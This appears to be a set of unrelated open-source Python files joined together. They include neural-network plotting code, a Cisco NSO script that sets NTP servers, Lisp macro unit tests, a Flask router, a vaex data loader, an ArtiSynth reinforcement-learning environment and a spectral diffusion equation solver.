def _setup_ax(self, ax):
ax.set_aspect('equal', adjustable = 'box')
ax.set_xlim(self.model.xlims)
ax.set_ylim(self.model.ylims)
def _plot_losses(self):
"""
Plot how each of the loss terms changes in time
"""
ax = self.fig.add_subplot(self.gs[2:5, :7])
losses = [self.model.data_losses, self.model.BC_losses, self.model.pde_losses, self.model.total_losses, self.model.norm_losses]
labels = ['pdf', 'BC', 'pde', 'total', 'norm']
zipped = zip(losses, labels)
for loss_list, label in zipped:
ax.plot(np.log10(loss_list), label = label)
ax.legend()
def _plot_pdfs_getUandD(self):
"""
Run inference to get the pdf, potential (U) and diffusivity (D)
"""
p_max = 0
D_max = 0
for idx_t, test_time in enumerate(np.linspace(self.model.tlims[0], self.model.tlims[1], 7)): # test for a range of unseen times
t_test = np.tile(np.array([test_time]), (self.x_test.shape[0], 1))
t_test = tf.convert_to_tensor(t_test)
xyt_test = tf.concat((self.x_test, self.y_test, t_test), axis = 1)
p_out, D_out, U_out = self.model.predict(xyt_test)
D_out = D_out.numpy()
p_max = max(p_max, np.max(p_out))
D_max = max(D_max, np.max(D_out))
for idx_t, test_time in enumerate(np.linspace(self.model.tlims[0], self.model.tlims[1], 7)): # test for a range of unseen times
t_test = np.tile(np.array([test_time]), (self.x_test.shape[0], 1))
t_test = tf.convert_to_tensor(t_test)
xyt_test = tf.concat((self.x_test, self.y_test, t_test), axis = 1)
p_out, D_out, U_out = self.model.predict(xyt_test)
p_out = p_out.numpy()
D_out = D_out.numpy()
U_out = U_out.numpy()
ax_p = self.fig.add_subplot(self.gs[6, idx_t])
p_out[p_out<1e-7] = np.nan
ax_p.scatter(self.x_test, self.y_test, c = np.log10(p_out), vmin = -7, vmax = max(np.log10(p_max), -7))
self._setup_ax(ax_p)
ax_D = self.fig.add_subplot(self.gs[6, 8+idx_t])
ax_D.scatter(self.x_test, self.y_test, c = D_out, vmin = 0, vmax = D_max)
self._setup_ax(ax_D)
for idx_t, arr in enumerate(self.model.pdf_list):
ax = self.fig.add_subplot(self.gs[14, idx_t])
to_log = copy.deepcopy(arr)
to_log[to_log<1e-7] = np.nan
ax.imshow(np.log10(to_log.reshape((200, 200))[::-1, :]))
self.U_out = U_out
def _plot_and_save_U(self):
"""
Plot and save the potential as an array
"""
U = np.reshape(self.U_out, (self.model.dims, self.model.dims))
path = self.save_dir + 'potential.pickle'
dump_pickle(U, path)
ax = self.fig.add_subplot(self.gs[:4, 10:14])
gx, gy = np.gradient(U)
ax.imshow(np.log10(np.sqrt(gx**2 + gy**2))[::-1, :])
ax.set_aspect('equal', adjustable = 'box')
| 2.21875
| 2
|
nso/test_api.py
|
caputomarcos/network-programmability-stream
| 120
|
12783544
|
<reponame>caputomarcos/network-programmability-stream
#!/usr/bin/env python3
import ncs
from ncs.maagic import Root
from typing import Iterator, Tuple
NSO_USERNAME = 'admin'
NSO_CONTEXT = 'python'
# NSO_GROUPS = ['ncsadmin']
def get_device_name(nso: Root) -> Iterator[Tuple[str, str]]:
for device in nso.devices.device:
# print device.config.ios__cached_show.version.model
breakpoint()
yield (device.name, device.ios__cached_show.version.model)
def main() -> None:
with ncs.maapi.single_read_trans(NSO_USERNAME, NSO_CONTEXT) as transaction:
nso = ncs.maagic.get_root(transaction)
devices = nso.devices.device
# print(devices["isp1-pe1"].config.ios__ntp.server.peer_list)
# breakpoint()
for device in devices:
device.config.ios__ntp.server.peer_list.append({"name": "192.168.3.11"})
# device.config.ios__ntp.server.ip = "192.168.3.11"
# print(device.name)
# print(device.config.ios__ntp)
# print(device.config.ios__cached_show.version)
transaction.apply()
if __name__ == '__main__':
main()
| 2.0625
| 2
|
test/test_macro/test_system_macro.py
|
takahish/lispy
| 4
|
12783545
|
# Copyright 2019 <NAME>. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import unittest
from clispy.macro.system_macro import *
from clispy.package import PackageManager
from clispy.parser import Parser
class SystemMacroUnitTestCase(unittest.TestCase):
def testSystemMacro(self):
# Makes an instance of SystemMacro.
macro = SystemMacro()
# Checks official representation.
self.assertRegex(str(macro), r"#<SYSTEM-MACRO SYSTEM-MACRO \{[0-9A-Z]+\}>")
class BlockSystemMacroUnitTestCase(unittest.TestCase):
def testBlockSystemMacro(self):
# Makes an instance of BlockSystemMacro.
macro = BlockSystemMacro()
# Checks official representation.
self.assertRegex(str(macro), r"#<SYSTEM-MACRO BLOCK \{[0-9A-Z]+\}>")
def testBlockSystemMacro_call(self):
# Makes an instance of BlockSystemMacro.
macro = BlockSystemMacro()
# Checks official representation.
forms = Parser.parse('(NAME (+ 1 2 3))')
forms = macro(
forms,
PackageManager.current_package.env['VARIABLE'],
PackageManager.current_package.env['FUNCTION'],
PackageManager.current_package.env['MACRO']
)
# Checks expanded forms.
self.assertEqual(str(forms), '(BLOCK NAME (PROGN (+ 1 2 3)))')
class FletSystemMacroUnitTestCase(unittest.TestCase):
def testFletSystemMacro(self):
# Makes an instance of FletSystemMacro.
macro = FletSystemMacro()
# Checks official representation.
self.assertRegex(str(macro), r"#<SYSTEM-MACRO FLET \{[0-9A-Z]+\}>")
def testFletSystemMacro_call(self):
# Makes an instance of FletSystemMacro.
macro = FletSystemMacro()
# Checks official representation.
forms = Parser.parse('(((TEST (X) (* X X X))) (TEST 10))')
forms = macro(
forms,
PackageManager.current_package.env['VARIABLE'],
PackageManager.current_package.env['FUNCTION'],
PackageManager.current_package.env['MACRO']
)
# Checks expanded forms.
self.assertEqual(str(forms), '(FLET ((TEST (X) (* X X X))) (PROGN (TEST 10)))')
class IfSystemMacroUnitTestCase(unittest.TestCase):
def testIfSystemMacro(self):
# Makes an instance of IfSystemMacro.
macro = IfSystemMacro()
# Checks official representation.
self.assertRegex(str(macro), r"#<SYSTEM-MACRO IF \{[0-9A-Z]+\}>")
def testIfSystemMacro_call(self):
# Makes an instance of IfSystemMacro.
macro = IfSystemMacro()
# Checks official representation.
self.assertRegex(str(macro), r"#<SYSTEM-MACRO IF \{[0-9A-Z]+\}>")
# Checks official representation.
forms = Parser.parse('((= 1 2) 3)')
forms = macro(
forms,
PackageManager.current_package.env['VARIABLE'],
PackageManager.current_package.env['FUNCTION'],
PackageManager.current_package.env['MACRO']
)
# Checks expanded forms.
self.assertEqual(str(forms), '(IF (= 1 2) 3 NIL)')
class LabelsSystemMacroUnitTestCase(unittest.TestCase):
def testLabelsSystemMacro(self):
# Makes an instance of LabelsSystemMacro.
macro = LabelsSystemMacro()
# Checks official representation.
self.assertRegex(str(macro), r"#<SYSTEM-MACRO LABELS \{[0-9A-Z]+\}>")
def testLabelsSystemMacro_call(self):
# Makes an instance of LabelsSystemMacro.
macro = LabelsSystemMacro()
# Checks official representation.
forms = Parser.parse('(((TEST (X) (* X X X))) (TEST 10))')
forms = macro(
forms,
PackageManager.current_package.env['VARIABLE'],
PackageManager.current_package.env['FUNCTION'],
PackageManager.current_package.env['MACRO']
)
# Checks expanded forms.
self.assertEqual(str(forms), '(LABELS ((TEST (X) (* X X X))) (PROGN (TEST 10)))')
class LetSystemMacroUnitTestCase(unittest.TestCase):
def testLetSystemMacro(self):
# Makes an instance of LetSystemMacro.
macro = LetSystemMacro()
# Checks official representation.
self.assertRegex(str(macro), r"#<SYSTEM-MACRO LET \{[0-9A-Z]+\}>")
def testLetSystemMacro_call(self):
# Makes an instance of LetSystemMacro.
macro = LetSystemMacro()
# Checks official representation.
forms = Parser.parse('(((TEST 10)) (CONS TEST NIL))')
forms = macro(
forms,
PackageManager.current_package.env['VARIABLE'],
PackageManager.current_package.env['FUNCTION'],
PackageManager.current_package.env['MACRO']
)
# Checks expanded forms.
self.assertEqual(str(forms), '(LET ((TEST 10)) (PROGN (CONS TEST NIL)))')
class LetAsterSystemMacroUnitTestCase(unittest.TestCase):
def testLetAsterSystemMacro(self):
# Makes an instance of LetAsterSystemMacro.
macro = LetAsterSystemMacro()
# Checks official representation.
self.assertRegex(str(macro), r"#<SYSTEM-MACRO LET\* \{[0-9A-Z]+\}>")
def testLetAsterSystemMacro_call(self):
# Makes an instance of LetAsterSystemMacro.
macro = LetAsterSystemMacro()
# Checks official representation.
forms = Parser.parse('(((TEST 10)) (CONS TEST NIL))')
forms = macro(
forms,
PackageManager.current_package.env['VARIABLE'],
PackageManager.current_package.env['FUNCTION'],
PackageManager.current_package.env['MACRO']
)
# Checks expanded forms.
self.assertEqual(str(forms), '(LET* ((TEST 10)) (PROGN (CONS TEST NIL)))')
class QuoteSystemMacroUnitTestCase(unittest.TestCase):
def testQuoteSystemMacro(self):
# Makes an instance of QuoteSystemMacro.
macro = QuoteSystemMacro()
# Checks official representation.
self.assertRegex(str(macro), r"#<SYSTEM-MACRO QUOTE \{[0-9A-Z]+\}>")
def testQuoteSystemMacro_call(self):
# Makes an instance of QuoteSystemMacro.
macro = QuoteSystemMacro()
# Checks official representation.
forms = Parser.parse('(A)')
forms = macro(
forms,
PackageManager.current_package.env['VARIABLE'],
PackageManager.current_package.env['FUNCTION'],
PackageManager.current_package.env['MACRO']
)
# Checks expanded forms.
self.assertEqual(str(forms), '(QUOTE A)')
class LambdaSystemMacroUnitTestCase(unittest.TestCase):
def testLambdaSystemMacro(self):
# Makes an instance of LambdaSystemMacro.
macro = LambdaSystemMacro()
# Checks official representation.
self.assertRegex(str(macro), r"#<SYSTEM-MACRO LAMBDA \{[0-9A-Z]+\}>")
def testLambdaSystemMacro_call(self):
# Makes an instance of LambdaSystemMacro.
macro = LambdaSystemMacro()
# Checks official representation.
forms = Parser.parse('((X) (* X X X))')
forms = macro(
forms,
PackageManager.current_package.env['VARIABLE'],
PackageManager.current_package.env['FUNCTION'],
PackageManager.current_package.env['MACRO']
)
# Checks expanded forms.
self.assertEqual(str(forms), '(LAMBDA (X) (PROGN (* X X X)))')
class DefunSystemMacroUnitTestCase(unittest.TestCase):
def testDefunSystemMacro(self):
# Makes an instance of DefunSystemMacro.
macro = DefunSystemMacro()
# Checks official representation.
self.assertRegex(str(macro), r"#<SYSTEM-MACRO DEFUN \{[0-9A-Z]+\}>")
def testDefunSystemMacro_call(self):
# Makes an instance of DefunSystemMacro.
macro = DefunSystemMacro()
# Checks official representation.
forms = Parser.parse('(NAME (X) (* X X X))')
forms = macro(
forms,
PackageManager.current_package.env['VARIABLE'],
PackageManager.current_package.env['FUNCTION'],
PackageManager.current_package.env['MACRO']
)
# Checks expanded forms.
self.assertEqual(str(forms), '(DEFUN NAME (X) (BLOCK NAME (PROGN (* X X X))))')
class DefmacroSystemMacroUnitTestCase(unittest.TestCase):
def testDefmacroSystemMacro(self):
# Makes an instance of DefmacroSystemMacro.
macro = DefmacroSystemMacro()
# Checks official representation.
self.assertRegex(str(macro), r"#<SYSTEM-MACRO DEFMACRO \{[0-9A-Z]+\}>")
def testDefmacroSystemMacro_call(self):
# Makes an instance of DefunSystemMacro.
macro = DefmacroSystemMacro()
# Checks official representation.
forms = Parser.parse('(NAME (X) (* X X X))')
forms = macro(
forms,
PackageManager.current_package.env['VARIABLE'],
PackageManager.current_package.env['FUNCTION'],
PackageManager.current_package.env['MACRO']
)
# Checks expanded forms.
self.assertEqual(str(forms), '(DEFMACRO NAME (X) (BLOCK NAME (PROGN (* X X X))))')
class BackquoteSystemMacroUnitTestCase(unittest.TestCase):
def testBackquoteSystemMacro(self):
# Makes an instance of BackquoteSystemMacro.
macro = BackquoteSystemMacro()
# Checks official representation.
self.assertRegex(str(macro), r"#<SYSTEM-MACRO BACKQUOTE \{[0-9A-Z]+\}>")
def testBackquoteSystemMacro_call(self):
# Makes an instance of DefunSystemMacro.
macro = BackquoteSystemMacro()
# Checks official representation.
forms = Parser.parse('(((UNQUOTE X) (UNQUOTE-SPLICING Y)))')
forms = macro(
forms,
PackageManager.current_package.env['VARIABLE'],
PackageManager.current_package.env['FUNCTION'],
PackageManager.current_package.env['MACRO']
)
# Checks expanded forms.
self.assertEqual(str(forms), '(CONS X (APPEND Y (QUOTE NIL)))')
| 2.28125
| 2
|
backend/routers/timeline.py
|
DavidLee0216/SWOOSH
| 0
|
12783546
|
from flask import request, Blueprint
from controllers import timelines
from pkg.warpResponse import warpResponse
timeline = Blueprint('timeline', __name__)
@timeline.route("/", methods=['GET'])
def getAllTimelines():
resp, code = timelines.FindAll()
if resp is not None:
return warpResponse(resp)
else:
return warpResponse(None, code)
@timeline.route("/findOne", methods=['POST'])
def getOneTimelines():
r = request.get_json()
if 'start' in r:
resp, code = timelines.FindAllWithCond(r)
else:
resp, code = timelines.FindOne(r)
if resp is not None:
return warpResponse(resp)
else:
return warpResponse(None, code)
@timeline.route("/add", methods=['POST'])
def createTimelines():
r = request.get_json()
code = timelines.Create(r)
    return warpResponse(None, code)
@timeline.route("/<id>", methods=['POST'])
def patchTimelines(id):
r = request.get_json()
code = timelines.Patch(id, r)
    return warpResponse(None, code)
| 2.484375
| 2
|
glue_vaex/__init__.py
|
glue-viz/glue-vaex
| 0
|
12783547
|
from __future__ import absolute_import, division, print_function
import os
import glob
import numpy as np
from glue.logger import logger
from glue.core.data import Data
from glue.config import data_factory
import vaex.hdf5.dataset
from .data import DataVaex
def is_vaex_file(source):
return vaex.hdf5.dataset.Hdf5MemoryMapped.can_open(source)
@data_factory(
label='vaex file or directory',
identifier=is_vaex_file,
priority=1000,
)
def vaex_reader(source):
"""
Read a vaex hdf5 file
"""
if os.path.isdir(source):
arrays = {}
for filename in glob.glob(os.path.join(source, '*')):
if is_vaex_file(filename):
logger.info("Reading vaex data from {0}".format(filename))
                ds = vaex.open(filename)
                arrays[filename] = ds
else:
logger.info("Not a vaex file: {0}".format(filename))
# If there are no vaex files, we raise an error, and if there is one
# then we are done!
if len(arrays) == 0:
raise Exception("No vaex files found in directory: {0}".format(source))
elif len(arrays) == 1:
label = list(arrays.keys())[0]
return [Data(array=arrays[label], label=label)]
# We now check whether all the shapes of the vaex files are the same,
# and if so, we merge them into a single file.
labels = sorted(arrays)
ref_shape = arrays[labels[0]].shape
for label in labels[1:]:
if arrays[label].shape != ref_shape:
break
else:
# Since we are here, the shapes of all the vaex files match, so
# we can construct a higher-dimensional array.
# Make sure arrays are sorted while constructing array
            array = np.array([arrays[label] for label in labels])
            # We flip the array here so that in most cases the scan starts at the
            # top of e.g. the body and moves downwards.
            array = array[::-1]
            # dicom_label is not defined in this module; fall back to the source name
            return [Data(array=array, label=os.path.basename(source))]
# If we are here, the shapes of the vaex files didn't match, so we
# simply return one Data object per vaex file.
return [Data(array=arrays[label], label=label) for label in labels]
else:
ds = vaex.open(source)
data = [DataVaex(ds)]
return data
| 2.40625
| 2
|
src/python/artisynth_envs/envs/point2point_env.py
|
amir-abdi/artisynth-rl
| 4
|
12783548
|
<filename>src/python/artisynth_envs/envs/point2point_env.py
import numpy as np
from common import constants as c
from common.config import setup_logger
from artisynth_envs.artisynth_base_env import ArtiSynthBase
logger = setup_logger()
class Point2PointEnv(ArtiSynthBase):
def __init__(self, goal_threshold, wait_action, reset_step, goal_reward, **kwargs):
super().__init__(**kwargs)
self.goal_threshold = goal_threshold
self.prev_distance = None
self.wait_action = wait_action
self.episode_counter = 0
self.reset_step = int(reset_step)
self.goal_reward = goal_reward
self.position_radius = self.get_radius(kwargs['artisynth_args'])
self.init_spaces()
@staticmethod
def get_radius(args_str):
return float(args_str.split('radius ')[1])
def get_state_boundaries(self, action_size):
low = []
high = []
if self.include_current_state:
for i in range(3):
low.append(-self.position_radius)
high.append(self.position_radius)
for i in range(3):
low.append(-self.position_radius)
high.append(self.position_radius)
low = np.array(low)
high = np.array(high)
if self.include_current_excitations:
low = np.append(low, np.full((action_size,), 0))
high = np.append(high, np.full((action_size,), 1))
return low, high
def reset(self):
self.prev_distance = None
logger.info('Reset')
return super().reset()
def configure(self, *args, **kwargs):
pass
def step(self, action):
logger.debug('action:{}'.format(action))
self.episode_counter += 1
self.take_action(action)
self.sleep(self.wait_action)
state = self.get_state_dict()
if not state:
return None, 0, False, {}
obs = state[c.OBSERVATION_STR]
distance = self.distance_to_target(obs)
reward, done, info = self.calculate_reward(distance, self.prev_distance)
self.prev_distance = distance
state_arr = self.state_dic_to_array(state)
if self.episode_counter >= self.reset_step:
done = True
return state_arr, reward, done, info
def calculate_reward(self, new_dist, prev_dist):
if not prev_dist:
return 0, False, {}
done = False
info = {'distance': new_dist}
if new_dist < self.goal_threshold:
done = True
reward = 5
logger.log(msg='Achieved done state', level=18)
else:
if prev_dist - new_dist > 0:
reward = 1 / self.episode_counter
else:
reward = -1
logger.log(msg='Reward: ' + str(reward), level=18)
return reward, done, info
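    # Hedged worked example (illustration only): with episode_counter = 4, moving from
    # prev_dist = 0.40 to new_dist = 0.30 (with new_dist still >= goal_threshold) gives
    # reward = 1 / 4 = 0.25; moving away instead gives reward = -1; and dropping below
    # goal_threshold gives reward = 5 and ends the episode.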
| 2.328125
| 2
|
pyapprox/benchmarks/spectral_diffusion.py
|
ConnectedSystems/pyapprox
| 26
|
12783549
|
import numpy as np
import inspect
from scipy.linalg import qr as qr_factorization
from copy import deepcopy
from pyapprox.utilities import cartesian_product, outer_product
from pyapprox.univariate_polynomials.quadrature import gauss_jacobi_pts_wts_1D
from pyapprox.barycentric_interpolation import (
compute_barycentric_weights_1d,
multivariate_barycentric_lagrange_interpolation
)
from pyapprox.models.wrappers import (
evaluate_1darray_function_on_2d_array
)
from pyapprox.utilities import qr_solve
def kronecker_product_2d(matrix1, matrix2):
"""
    TODO: I can store kronecker product as a sparse matrix see ( scipy.kron )
"""
assert matrix1.shape == matrix2.shape
assert matrix1.ndim == 2
block_num_rows = matrix1.shape[0]
matrix_num_rows = block_num_rows**2
matrix = np.empty((matrix_num_rows, matrix_num_rows), float)
# loop through blocks
start_col = 0
for jj in range(block_num_rows):
start_row = 0
for ii in range(block_num_rows):
matrix[start_row:start_row+block_num_rows,
start_col:start_col+block_num_rows] = \
matrix2*matrix1[ii, jj]
start_row += block_num_rows
start_col += block_num_rows
return matrix
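# Hedged check (illustration only): for equally-shaped square blocks this construction
# should agree with numpy's built-in Kronecker product, e.g.
#
#   A = np.array([[1., 2.], [3., 4.]])
#   B = np.array([[0., 5.], [6., 7.]])
#   np.allclose(kronecker_product_2d(A, B), np.kron(A, B))   # True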
def chebyshev_derivative_matrix(order):
if order == 0:
pts = np.array([1], float)
derivative_matrix = np.array([0], float)
else:
# this is reverse order used by matlab cheb function
pts = -np.cos(np.linspace(0., np.pi, order+1))
scalars = np.ones((order+1), float)
scalars[0] = 2.
scalars[order] = 2.
scalars[1:order+1:2] *= -1
derivative_matrix = np.empty((order+1, order+1), float)
for ii in range(order+1):
row_sum = 0.
for jj in range(order+1):
if (ii == jj):
denominator = 1.
else:
denominator = pts[ii]-pts[jj]
numerator = scalars[ii] / scalars[jj]
derivative_matrix[ii, jj] = numerator / denominator
row_sum += derivative_matrix[ii, jj]
derivative_matrix[ii, ii] -= row_sum
# I return points and calculate derivatives using reverse order of points
# compared to what is used by Matlab cheb function thus the
# derivative matrix I return will be the negative of the matlab version
return pts, derivative_matrix
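# Hedged usage sketch (illustration only): the matrix differentiates data sampled at the
# returned Chebyshev points, exactly for polynomials up to the given order, e.g. for x**2:
#
#   pts, D = chebyshev_derivative_matrix(4)
#   np.allclose(np.dot(D, pts**2), 2 * pts)   # True, since d/dx x**2 = 2x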
class SteadyStateDiffusionEquation1D(object):
"""
solve (a(x)*u_x)_x = f; x in [0,1]; subject to u(0)=a; u(1)=b
"""
def __init__(self):
self.diffusivity = None
self.forcing_function = None
self.bndry_cond = [0., 0.]
self.xlim = [0, 1]
self.adjoint_derivative_matrix = None
self.adjoint_mesh_pts = None
self.num_time_steps = 0
self.time_step_size = None
self.initial_sol = None
self.num_stored_timesteps = 1
self.time_step_method = 'crank-nicholson'
# default qoi functional is integral of solution over entire domain
self.qoi_functional = self.integrate
self.qoi_functional_deriv = lambda x: x*0.+1.
def scale_canonical_pts(self, pts):
return (self.xlim[1]-self.xlim[0])*(pts+1.)/2.+self.xlim[0]
def initialize(self, order, bndry_cond=None, xlim=None):
self.order = order
if xlim is not None:
self.xlim = xlim
if bndry_cond is not None:
self.bndry_cond = bndry_cond
mesh_pts, self.derivative_matrix = chebyshev_derivative_matrix(order)
# scale mesh points from [-1,1] to [a,b]
self.mesh_pts_1d = self.scale_canonical_pts(mesh_pts)
self.mesh_pts = self.mesh_pts_1d
# scale derivative matrix from [-1,1] to [a,b]
self.derivative_matrix *= 2./(self.xlim[1]-self.xlim[0])
def set_diffusivity(self, func):
assert callable(func)
assert len(inspect.getargspec(func)[0]) == 2
self.diffusivity = func
def set_forcing(self, func):
assert callable(func)
assert len(inspect.getargspec(func)[0]) == 2
self.forcing_function = func
def form_collocation_matrix(self, derivative_matrix, diagonal):
scaled_matrix = np.empty(derivative_matrix.shape)
for i in range(scaled_matrix.shape[0]):
scaled_matrix[i, :] = derivative_matrix[i, :] * diagonal[i]
matrix = np.dot(derivative_matrix, scaled_matrix)
return matrix
def apply_boundary_conditions_to_matrix(self, matrix):
matrix[0, :] = 0
matrix[-1, :] = 0
matrix[0, 0] = 1
matrix[-1, -1] = 1
return matrix
def apply_boundary_conditions_to_rhs(self, rhs):
rhs[0] = self.bndry_cond[0]
rhs[-1] = self.bndry_cond[1]
return rhs
def apply_boundary_conditions(self, matrix, forcing):
assert len(self.bndry_cond) == 2
matrix = self.apply_boundary_conditions_to_matrix(matrix)
forcing = self.apply_boundary_conditions_to_rhs(forcing)
return matrix, forcing
def explicit_runge_kutta(self, rhs, sol, time, time_step_size):
assert callable(rhs)
dt2 = time_step_size/2.
k1 = rhs(time, sol)
k2 = rhs(time+dt2, sol+dt2*k1)
k3 = rhs(time+dt2, sol+dt2*k2)
k4 = rhs(time+time_step_size, sol+time_step_size*k3)
new_sol = sol+time_step_size/6.*(k1+2.*k2+2.*k3+k4)
new_sol[0] = self.bndry_cond[0]
new_sol[-1] = self.bndry_cond[1]
return new_sol
def form_adams_moulton_3rd_order_system(self, matrix, current_sol,
current_forcing, future_forcing,
prev_forcing, prev_sol,
time_step_size):
""" 3rd order Adams-Moultobn method
WARNING: seems to be unstable (at least my implementation)
y_{n+2} = y_{n+1}+h(c_0y_{n+2}+c_1y_{n+1}+c_3y_{n})
c = (5/12,2/3,-1./12)
"""
dt12 = time_step_size/12.
dt12matrix = dt12*matrix
identity = np.eye(matrix.shape[0])
matrix = identity-5.*dt12matrix
forcing = np.dot(identity+8.*dt12matrix, current_sol)
forcing += dt12*(5.*future_forcing+8.*current_forcing-prev_forcing)
forcing -= np.dot(dt12matrix, prev_sol)
# currently I do not support time varying boundary conditions
return self.apply_boundary_conditions(matrix, forcing)
def get_implicit_time_step_rhs(self, current_sol, time, sample):
future_forcing = self.forcing_function(
self.mesh_pts, time+self.time_step_size, sample)
if (self.time_step_method == "backward-euler"):
forcing = current_sol + self.time_step_size*future_forcing
elif (self.time_step_method == "crank-nicholson"):
identity = np.eye(self.collocation_matrix.shape[0])
forcing = np.dot(
identity+0.5*self.time_step_size*self.collocation_matrix, current_sol)
current_forcing = self.forcing_function(
self.mesh_pts, time, sample)
forcing += 0.5*self.time_step_size*(current_forcing+future_forcing)
else:
raise Exception('incorrect timestepping method specified')
# apply boundary conditions
forcing[0] = self.bndry_cond[0]
forcing[-1] = self.bndry_cond[1]
return forcing
def get_implicit_timestep_matrix_inverse_factors(self, matrix):
identity = np.eye(matrix.shape[0])
if (self.time_step_method == "backward-euler"):
matrix = identity-self.time_step_size*matrix
elif (self.time_step_method == "crank-nicholson"):
matrix = identity-self.time_step_size/2.*matrix
else:
raise Exception('incorrect timestepping method specified')
self.apply_boundary_conditions_to_matrix(matrix)
return qr_factorization(matrix)
def time_step(self, current_sol, time, sample):
if self.time_step_method == 'RK4':
def rhs_func(t, u): return np.dot(
self.collocation_matrix, u) +\
self.forcing_function(self.mesh_pts, t, sample)
current_sol = self.explicit_runge_kutta(
rhs_func, current_sol, time, self.time_step_size)
else:
rhs = self.get_implicit_time_step_rhs(current_sol, time, sample)
current_sol = qr_solve(
self.implicit_matrix_factors[0], self.implicit_matrix_factors[1],
rhs[:, None])[:, 0]
#current_sol = np.linalg.solve( matrix, rhs )
return current_sol
def transient_solve(self, sample):
# in future consider supporting time varying diffusivity. This would
# require updating collocation matrix at each time-step
# for now make diffusivity time-independent
# assert self.diffusivity_function.__code__.co_argcount == 3
diffusivity = self.diffusivity_function(self.mesh_pts, sample)
self.collocation_matrix = self.form_collocation_matrix(
self.derivative_matrix, diffusivity)
# consider replacing time = 0 with time = self.initial_time
time = 0.
assert self.forcing_function.__code__.co_argcount == 3
current_forcing = self.forcing_function(self.mesh_pts, time, sample)
if self.num_time_steps > 0:
assert self.initial_sol is not None
assert self.time_step_size is not None
current_sol = self.initial_sol.copy()
assert self.num_stored_timesteps <= self.num_time_steps
# num_time_steps is number of steps taken after initial time
self.times = np.empty((self.num_stored_timesteps), float)
sols = np.empty((self.initial_sol.shape[0],
self.num_stored_timesteps), float)
sol_cntr = 0
# integer division so the storage stride is an exact step count
sol_storage_stride = self.num_time_steps//self.num_stored_timesteps
if self.time_step_method != 'RK4':
self.implicit_matrix_factors = \
self.get_implicit_timestep_matrix_inverse_factors(
self.collocation_matrix)
for i in range(1, self.num_time_steps+1):
# Construct linear system
current_sol = self.time_step(current_sol, time, sample)
time += self.time_step_size
# Store history if requested
if i % sol_storage_stride == 0:
sols[:, sol_cntr] = current_sol
self.times[sol_cntr] = time
sol_cntr += 1
assert sol_cntr == self.num_stored_timesteps
return sols
else:
current_forcing = self.forcing_function(
self.mesh_pts, time, sample)
matrix, rhs = self.apply_boundary_conditions(
self.collocation_matrix.copy(), current_forcing)
return np.linalg.solve(matrix, rhs)
def solve(self, diffusivity, forcing):
assert diffusivity.ndim == 1
assert forcing.ndim == 1
# forcing will be overwritten with boundary values so we must take a
# copy first
forcing = forcing.copy()
# we need another copy so that forcing can be used when solving adjoint
self.forcing_vals = forcing.copy()
assert not np.any(diffusivity <= 0.)
self.collocation_matrix = self.form_collocation_matrix(
self.derivative_matrix, diffusivity)
matrix, forcing = self.apply_boundary_conditions(
self.collocation_matrix.copy(), forcing)
solution = np.linalg.solve(matrix, forcing)
# store solution for use with adjoints
self.fwd_solution = solution.copy()
return solution
def run(self, sample):
assert sample.ndim == 1
diffusivity = self.diffusivity_function(self.mesh_pts, sample)
forcing = self.forcing_function(self.mesh_pts, sample)
solution = self.solve(diffusivity, forcing)
return solution
def solve_adjoint(self, sample, order):
"""
Typically with FEM we solve Ax=b and the discrete adjoint equation
is A'y=z, but with collocation this does not work. Instead of
taking the adjoint of the discrete system, as the aforementioned
approach does, we discretize the continuous adjoint equation, which
for the elliptic diffusion equation is again Ay=z; that is, the
adjoint of A is A itself.
"""
if order == self.order:
# used when computing gradient from adjoint solution
matrix = self.collocation_matrix.copy()
else:
# used when computing error estimate from adjoint solution
if self.adjoint_derivative_matrix is None:
adjoint_mesh_pts, self.adjoint_derivative_matrix = \
chebyshev_derivative_matrix(order)
self.adjoint_mesh_pts = self.scale_canonical_pts(
adjoint_mesh_pts)
# scale derivative matrix from [-1,1] to [a,b]
self.adjoint_derivative_matrix *= 2. / \
(self.xlim[1]-self.xlim[0])
diffusivity = self.diffusivity_function(
self.adjoint_mesh_pts, sample)
matrix = self.form_collocation_matrix(
self.adjoint_derivative_matrix, diffusivity)
self.adjoint_collocation_matrix = matrix.copy()
# regardless of whether computing error estimate or
# computing gradient, rhs is always derivative (with respect to the
# solution) of the qoi_functional
qoi_deriv = self.qoi_functional_deriv(self.fwd_solution)
matrix = self.apply_boundary_conditions_to_matrix(matrix)
qoi_deriv = self.apply_adjoint_boundary_conditions_to_rhs(qoi_deriv)
adj_solution = np.linalg.solve(matrix, qoi_deriv)
return adj_solution
def apply_adjoint_boundary_conditions_to_rhs(self, qoi_deriv):
# adjoint always has zero Dirichlet BC
qoi_deriv[0] = 0
qoi_deriv[-1] = 0
return qoi_deriv
def compute_residual(self, matrix, solution, forcing):
matrix, forcing = self.apply_boundary_conditions(matrix, forcing)
return forcing - np.dot(matrix, solution)
def compute_residual_derivative(self, solution, diagonal,
forcing_deriv):
matrix = self.form_collocation_matrix(self.derivative_matrix,
diagonal)
# TODO: check whether boundary conditions need to be applied to both
# the matrix and forcing_deriv or just the matrix. If the former,
# what boundary conditions should be imposed on the forcing derivative?
matrix = self.apply_boundary_conditions_to_matrix(
matrix)
# the values here are the derivative of the boundary conditions
# with respect to the random parameters. I assume that
# this is always zero
forcing_deriv[0] = 0
forcing_deriv[-1] = 0
return forcing_deriv.squeeze() - np.dot(matrix, solution)
def compute_error_estimate(self, sample):
raise NotImplementedError("Not passing tests")
# must solve adjoint with a higher order grid
adj_solution = self.solve_adjoint(sample, self.order*2)
# interpolate forward solution onto higher-order grid
interp_fwd_solution = self.interpolate(
self.fwd_solution, self.adjoint_mesh_pts)
# compute residual of forward solution using higher-order grid
forcing_vals = self.forcing_function(self.adjoint_mesh_pts,
sample)
# compute residual
residual = self.compute_residual(self.adjoint_collocation_matrix,
interp_fwd_solution, forcing_vals)
# self.plot(interp_fwd_solution+adj_solution,
# plot_mesh_coords=self.adjoint_mesh_pts )
# self.plot(residual, plot_mesh_coords=self.adjoint_mesh_pts,
# color='r')
# pylab.show()
# print self.integrate((adj_solution+interp_fwd_solution )**2)
# print(np.dot(residual, adj_solution )/self.integrate(
# residual * adj_solution)
print('cond', np.linalg.cond(self.adjoint_collocation_matrix))
